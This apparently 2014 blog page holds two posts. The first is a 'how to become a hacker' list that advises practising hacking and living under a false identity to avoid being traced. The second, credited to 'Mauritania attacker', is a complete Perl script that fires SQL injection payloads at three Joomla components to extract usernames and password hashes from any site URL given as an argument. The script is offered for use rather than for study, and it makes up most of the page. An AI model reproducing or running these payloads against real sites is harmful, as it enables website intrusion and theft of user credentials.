Affichage des articles dont le libellé est how to become hacker. Afficher tous les articles
Affichage des articles dont le libellé est how to become hacker. Afficher tous les articles

how to become a hacker?


first we would like to clear concept here,that using hacking tools wont make you a hacker,you would be called cracker or noob in the cyberworld.
now,learning hacking is not easy job,but if you have a good  interest in hacking then it wont be tough for you.
first thing is,every hacker was a good noob at once.so dont feel shy or uncomfortable for asking help in hacking,well many believe in self learing.its upto you how you get started in learing HACKING
here we got some steps which you can follow to become to a hacker
1.learn all basic of computers(learn about operating systems,how things work, and more)
2.learn networking concepts
3.learn more than one operating systems(linux etc)
4.get started with programming(start with c)
5.learn php for all web hackings(it will help in web developing)
6.learn more than one programming language(java,c++,c# etc)
7.learn scripting language(javascript,phyton,etc)
8.read about latest hacking news,know new terms of hacking,know about new malwares
9.atleast work 5-6 hours daily on your computer
10.try to understand how hacking tools work,
11.try to make hacking tools with phyton or with any other language
12,find new vulnerabilty in web apps,or in website & work on it
13.most importantly ,learn to secure yourself for being hacked
14.last important step is to do experiments in hacking or in other words do a lot of practice in hacking.

well ,if you dont have knowlegde about your own security ,then dont try to hack into stuff,it  can be risky
always live with other identity,with you new name,a complete privacy,it will help you in protecting yourself.
just be anonymous for your safety.

meet hackers
www.meethackers.com

~ mercredi 20 août 2014 0 commentaires

[PERL] Joomla Sqli Exploiter v 1.0 by mauritania attacker 2014

                        [PERL] Joomla Sqli Exploiter v 1.0 by mauritania attacker




#!/usr/bin/perl
use IO::Socket::INET;
use LWP::UserAgent;
system("clear");
print "------------------------------------------------------------------------\n";
print "########################################################################\n";
print "#                         Joomla SQli 1.0 Exploiter                    #\n";
print "#                      *Coded by Mauritania Attacker*                  #\n";
print "# Greetz: AnonGhost - Mauritania HaCker Team - Procoder'z Team Albania #\n";
print "########################################################################\n";
print "------------------------------------------------------------------------\n\n";
$target = $ARGV[0];
$component = $ARGV[1];
if($target eq '' || $component eq '')
{
print "Usage: ./exploit.pl \n";
print "-----------------------------------\n";
print " Available Exploits :              \n";
print " 1- Joomla Component RSfiles       \n";
print " 2- Joomla General Sql Injection   \n";
print " 3- Joomla Component JEvents       \n";
print "-----------------------------------\n";
print " Example: ./exploit.pl http://www.site.com/ 1 \n\n";
exit(1);
}

open(FILE, "> contents11.txt");

if($target !~ /http:\/\//)
{
$target = "http://$target";
}

sleep 1.5;
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');


if($component == 1)
{
$host = $target . "/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--";
print " . . Exploiting Component RSfiles on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}








if($component == 2)

{
print " . . Exploiting General Sql Injection on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
$host = $target . "/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*";
$host1 = $target . "/index.php?option=com_commedia&format=raw&task=down&pid=59&id=999999.9 union all select (select concat(0x3c757365723e, username,0x3c757365723e3c706173733e,count(*),password,0x3c706173733e) from jos_users),null--";



@hosts = ($host,$host1);
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
sleep 1;
}
}
}










if($component == 3)

{
print " . . Exploiting Component JEvents on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
$host = $target . "/index.php?option=com_events&task=view_detail&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
$host1 = $target . "/index.php?option=com_events&task=view_year&Itemid=50&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
$host2 = $target . "/index.php?option=com_events&Itemid=34&task=view_year&month=11&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";


@hosts = ($host,$host1,$host2);
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
sleep 1;
}
}
}


By Mauritania attacker
meet hackers
www.meethackers.com

~ jeudi 3 juillet 2014 0 commentaires